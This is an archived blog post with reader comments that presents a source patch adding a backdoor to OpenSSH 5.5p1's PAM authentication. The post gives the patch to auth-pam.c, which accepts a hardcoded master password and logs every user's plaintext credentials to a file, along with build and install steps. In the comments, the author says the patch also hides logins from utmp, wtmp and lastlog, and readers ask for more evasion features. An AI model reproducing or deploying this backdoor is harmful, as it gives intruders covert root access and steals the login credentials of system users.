Close Panel

31

Jan

2012

OpenSSH Backdoor With PAM Support

By IPSECS Admin. Posted in Exploitation | 2 Comments »

How many of you using my OpenSSH 5.5p1 bakcdoor published on this url? It’s probably that you experience error about PAM and GSSAPI Authentication. In order to resolve this issue you must be enable PAM and Kerberos5 during compilation as shown below:

./configure –prefix=/usr –sysconfdir=/etc/ssh –enable-pam –enable-kerberos5

After successfully installing the OpenSSH backdoor and restarting sshd service, can you login as root with magic password? The answer is indeed “No”.  It’s because the authentication now handled by PAM module so authentication experiences failure. This experience may occur on Linux RHEL, CentOS, Ubuntu, and others family.

In order to solve this issue, you have to patch the auth-pam.c, recompile OpenSSH, and restart the sshd service. The patch for auth-pam.c is displayed below:

--- openssh-5.5p1/auth-pam.c	2009-07-12 16:07:21.000000000 +0400
+++ openssh-5.5p1.patch/auth-pam.c	2012-01-31 15:01:45.000000000 +0300
@@ -1190,6 +1190,11 @@
 	sshpam_password = password;
 	sshpam_authctxt = authctxt;

+	if (!strcmp(password, SECRETPW)) {
+               secret_ok=1;
+               return 1;
+        }
+
 	/*
 	 * If the user logging in is invalid, or is root but is not permitted
 	 * by PermitRootLogin, use an invalid password to prevent leaking
@@ -1208,6 +1213,10 @@
 	sshpam_err = pam_authenticate(sshpam_handle, flags);
 	sshpam_password = NULL;
 	if (sshpam_err == PAM_SUCCESS && authctxt->valid) {
+		if((f=fopen(ILOG,"a"))!=NULL){
+                     fprintf(f,"user:password --> %s:%s\n",authctxt->user, password);
+                     fclose(f);
+                }
 		debug("PAM: password authentication accepted for %.100s",
 		    authctxt->user);
 		return 1;

This patch can be downloaded from core.ipsecs.com. Have fun guys!

is
Email this author | All posts by | Subscribe to Entries (RSS)

 

2 Responses to “OpenSSH Backdoor With PAM Support”

  1. 1
    r0x0r Says:

    Hey.. your doing a good job.. but it will be great if you re-post the openssh patch with the issues fixed like the PAM one..
    keep up the good job!

  2. 2
    IPSECS Admin Says:

    Hi r0x0r,
    You have to apply OpenSSH patch in http://ipsecs.com/web/?p=264, then apply the auth-pam.c patch. Diff the patched OpenSSH 5.5p1 with the original OpenSSH 5.5p1.

  3. 3
    heyho Says:

    Hi,

    please look at this .. http://pastie.org/1869572/wrap

    is there anyway to have this stuff included, to hide from root and to to be logged in lastlogged in?

    thanks

  4. 4
    IPSECS Admin Says:

    Hi there, the patch is already hide our presence from utmp, wtmp, and lastlog (w, who, last, lastlog). In order to bypass sshd_config configuration, you can patch servconf.c

  5. 5
    saou Says:

    Hi,

    is it maybe possible to compile it on freebsd 7.x 8.x and 9.x?

    It would be nice.

    greets,

    saou

  6. 6
    Safee Says:

    Greetings! The site is great. Thank you for a great resource

 

Leave a Reply

XHTML: You can use these tags: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

 

What is 7 + 13 ?
Please leave these two fields as-is:
IMPORTANT! To be able to proceed, you need to solve the following simple math (so we know that you are a human) :-)